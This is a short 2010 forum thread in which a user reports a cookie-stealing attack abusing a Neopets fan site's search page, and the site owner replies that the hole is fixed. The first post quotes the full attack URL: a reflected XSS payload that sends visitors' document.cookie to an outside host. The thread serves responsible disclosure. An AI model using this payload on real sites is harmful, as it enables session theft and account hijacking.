iargue Posted February 17, 2010 Share Posted February 17, 2010 Hello!. I am a programmer over at www.neo[Removed].us, and recently someone tried to attack out members with a cookie grabber based off of your search engine. Of course we spotted it instantly, and protected our members, but we feel as though you should be aware of any exploits involving your site. So here is the link he was using you DO NOT VISIT THE LINK WHILE SIGNED INTO NEOPETS http://www.thedailyneopets.com/search.php?s=%22%3E%3Cscript%3Edocument.location='http://wocares.com/il/i.php?p=35%26i='%20%2b%20document.cookie;%3C/script%3E%3C!-- Hope to see you fix it soon :) Link to comment Share on other sites More sharing options...
Viridian Posted February 17, 2010 Share Posted February 17, 2010 That's pretty bad, though I'm almost sure only Ian can do something about this. Link to comment Share on other sites More sharing options...
Ian Posted February 17, 2010 Share Posted February 17, 2010 Hi, Thank you for pointing out this security vulnerability. It has been fixed. Best, Ian Link to comment Share on other sites More sharing options...
Recommended Posts